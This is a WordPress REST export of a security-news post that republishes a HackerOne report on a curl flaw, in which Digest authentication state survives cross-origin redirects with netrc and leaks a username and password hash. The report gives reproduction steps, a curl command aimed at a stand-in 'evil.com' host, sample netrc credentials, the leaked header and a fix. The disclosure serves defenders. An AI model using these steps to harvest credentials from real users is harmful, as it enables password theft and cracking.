{"id":47913,"date":"2026-04-19T17:37:03","date_gmt":"2026-04-19T17:37:03","guid":{"rendered":"http:\/\/localhost\/?p=47913"},"modified":"2026-04-19T17:37:03","modified_gmt":"2026-04-19T17:37:03","slug":"curl-digest-auth-state-leak-on-cross-origin-redirect-via-netrc-username-and-password-hash-sent-to-wr","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=47913","title":{"rendered":"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc &#8211; Username and Password Hash Sent to Wrong Host_H1:3680038"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-19T22:29:41&#8243;,&#8221;description&#8221;:&#8221;## Summary\\n\\nWhen curl follows an HTTP redirect from hostA to hostB using `&#8211;netrc &#8211;digest -L`, Digest authentication state (nonce, realm) from hostA persists and is combined with hostB&#8217;s netrc credentials to generate an unsolicited Digest Authorization header sent to hostB. This leaks hostB&#8217;s username in cleartext and a password hash computed under the attacker&#8217;s chosen nonce, enabling offline password cracking. The root cause is that Digest state is never cleared on redirect, `authhost-\\u003epicked` persists as `CURLAUTH_DIGEST`, and `conn-\\u003ebits.netrc` bypasses `Curl_auth_allowed_to_host()`. This is a variant of CVE-2022-27774 not covered by that fix &#8211; NTLM is correctly cleared on new connections (url.c:3373-3378) but Digest is not.\\n\\n## Affected version\\n\\n&#8220;`bash\\ncurl 8.20.0-DEV (x86_64-pc-linux-gnu)\\nRelease-Date: [unreleased]\\nProtocols: dict file ftp ftps gopher gophers http https imap imaps &#8230;\\nFeatures: alt-svc AsynchDNS brotli GSS-API HSTS HTTP2 HTTP3 &#8230;\\n&#8220;`\\n\\nTested on current master (commit rc-8_20_0-2), Linux x86_64. Likely affects all versions with `&#8211;netrc` + `&#8211;digest` + redirect support.\\n\\n## Steps To Reproduce\\n\\n  1. Save PoC script as `poc_digest_leak_crossorigin.py` and run it: `python3 poc_digest_leak_crossorigin.py`\\n\\nThe script starts two HTTP servers (hostA on port 8011, hostB on port 8012), creates a temporary netrc file with credentials for both hosts, and runs curl with `&#8211;resolve` to simulate distinct hostnames:\\n\\n&#8220;`bash\\ncurl &#8211;resolve hosta.evil.com:8011:127.0.0.1 \\\\\\n     &#8211;resolve hostb.corp.com:8012:127.0.0.1 \\\\\\n     &#8211;netrc-file \/tmp\/test_netrc \\\\\\n     &#8211;digest -L \\\\\\n     http:\/\/hosta.evil.com:8011\/login\\n&#8220;`\\n\\nNetrc file:\\n&#8220;`\\nmachine hosta.evil.com\\n  login evil_user\\n  password evil_pass\\n\\nmachine hostb.corp.com\\n  login corporate_admin\\n  password S3cretP@ssw0rd!\\n&#8220;`\\n\\n  2. Observe the output &#8211; hostB receives an unsolicited Digest Authorization header:\\n\\n&#8220;`bash\\n[hostA.evil.com] 401 Digest challenge sent\\n[hostA.evil.com] Authenticated, redirecting to hostB\\n\\nVULNERABILITY CONFIRMED: Cross-origin credential leak\\nhostB.corp.com received unsolicited Digest auth:\\n  Digest username=\\&#8221;corporate_admin\\&#8221;, realm=\\&#8221;evil-realm\\&#8221;,\\n    nonce=\\&#8221;attacker_controlled_nonce_abc\\&#8221;, uri=\\&#8221;\/secret\\&#8221;,\\n    cnonce=\\&#8221;b09d5KnvEUHWam89\\&#8221;, nc=00000002, qop=auth,\\n    response=\\&#8221;6e9f04d34189538559a22613f1fe4082\\&#8221;\\n\\n  LEAKED: hostB username = corporate_admin\\n  STALE:  realm from hostA = evil-realm\\n  STALE:  nonce from hostA = attacker_controlled_nonce_abc\\n  IMPACT: response hash = MD5(hostB_pass : attacker_nonce : &#8230;)\\n&#8220;`\\n\\n  3. Run the hash verification PoC to confirm offline cracking: `python3 poc_verify_hash.py`\\n\\nThis proves that knowing the attacker-chosen nonce + leaked hash is sufficient to brute-force the victim&#8217;s password offline.\\n\\n### Root cause (three interacting issues)\\n\\n**1. Digest state never cleared on redirect** &#8211; `data-\\u003estate.digest` (nonce, realm, cnonce) is only cleaned in `Curl_close()` and `curl_easy_reset()`, never during redirect handling.\\n\\n**2. `authhost-\\u003epicked` persists** &#8211; Set to `CURLAUTH_DIGEST` during hostA&#8217;s 401 challenge, never reset on redirect. NTLM is correctly cleared at url.c:3373-3378, but Digest is not.\\n\\n**3. `conn-\\u003ebits.netrc` bypasses auth check** &#8211; At http.c:842-844:\\n&#8220;`c\\nif(Curl_auth_allowed_to_host(data)\\n   || conn-\\u003ebits.netrc)  \/\/ bypasses cross-origin check\\n  result = output_auth_headers(&#8230;);\\n&#8220;`\\n\\n## Additional information\\n\\nThis is a variant of CVE-2022-27774 (credential leak on redirect). The fix for that CVE added `Curl_auth_allowed_to_host()`, but the `conn-\\u003ebits.netrc` exemption at http.c:842 bypasses it for stateful auth methods. NTLM state is correctly cleared on new connections (url.c:3373-3378) but Digest state is not &#8211; this asymmetry indicates an oversight.\\n\\nSuggested fix: Clear Digest state on cross-origin redirect:\\n\\n&#8220;`c\\n\/\/ In redirect handling, after host change detected:\\nif(!Curl_url_same_origin(base, href)) {\\n  Curl_auth_digest_cleanup(\\u0026data-\\u003estate.digest);\\n  data-\\u003estate.authhost.picked = CURLAUTH_NONE;\\n}\\n&#8220;`\\n\\n## Impact\\n\\nAn attacker who controls hostA can redirect a curl user to hostB and obtain: (1) hostB&#8217;s username in cleartext from the unsolicited Digest header, and (2) a Digest response hash computed with the attacker&#8217;s chosen nonce, enabling offline password cracking if the attacker can observe the request to hostB. This bypasses the credential leak protections added for CVE-2022-27774.&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T12:29:29&#8243;,&#8221;modified&#8221;:&#8221;2026-04-19T21:50:00&#8243;,&#8221;type&#8221;:&#8221;hackerone&#8221;,&#8221;title&#8221;:&#8221;curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc &#8211; Username and Password Hash Sent to Wrong Host&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;H1:3680038&#8243;,&#8221;bulletinFamily&#8221;:&#8221;bugbounty&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2022-27774&#8243;],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:5.7,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:U\/C:H\/I:N\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/hackerone.com\/reports\/3680038&#8243;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-19T22:29:41&#8243;,&#8221;description&#8221;:&#8221;## Summary\\n\\nWhen curl follows an HTTP redirect from hostA to hostB using `&#8211;netrc &#8211;digest -L`, Digest authentication state (nonce, realm) from hostA persists and is&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,138,12,117,21,13,7,11,5],"class_list":["post-47913","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-cvss-57","tag-exploit","tag-hackerone","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc - Username and Password Hash Sent to Wrong Host_H1:3680038 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=47913\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc - Username and Password Hash Sent to Wrong Host_H1:3680038 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-19T22:29:41&#8243;,&#8221;description&#8221;:&#8221;## SummarynnWhen curl follows an HTTP redirect from hostA to hostB using `&#8211;netrc &#8211;digest -L`, Digest authentication state (nonce, realm) from hostA persists and is...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=47913\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-19T17:37:03+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47913#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47913\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc &#8211; Username and Password Hash Sent to Wrong Host_H1:3680038\",\"datePublished\":\"2026-04-19T17:37:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47913\"},\"wordCount\":855,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-5.7\",\"exploit\",\"hackerone\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47913#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47913\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47913\",\"name\":\"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc - Username and Password Hash Sent to Wrong Host_H1:3680038 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-19T17:37:03+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47913#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47913\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47913#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc &#8211; Username and Password Hash Sent to Wrong Host_H1:3680038\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc - Username and Password Hash Sent to Wrong Host_H1:3680038 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=47913","og_locale":"en_US","og_type":"article","og_title":"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc - Username and Password Hash Sent to Wrong Host_H1:3680038 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-19T22:29:41&#8243;,&#8221;description&#8221;:&#8221;## SummarynnWhen curl follows an HTTP redirect from hostA to hostB using `&#8211;netrc &#8211;digest -L`, Digest authentication state (nonce, realm) from hostA persists and is...","og_url":"https:\/\/zero.redgem.net\/?p=47913","og_site_name":"zero redgem","article_published_time":"2026-04-19T17:37:03+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=47913#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=47913"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc &#8211; Username and Password Hash Sent to Wrong Host_H1:3680038","datePublished":"2026-04-19T17:37:03+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=47913"},"wordCount":855,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-5.7","exploit","hackerone","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=47913#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=47913","url":"https:\/\/zero.redgem.net\/?p=47913","name":"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc - Username and Password Hash Sent to Wrong Host_H1:3680038 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-19T17:37:03+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=47913#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=47913"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=47913#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc &#8211; Username and Password Hash Sent to Wrong Host_H1:3680038"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47913","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=47913"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47913\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=47913"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=47913"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=47913"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}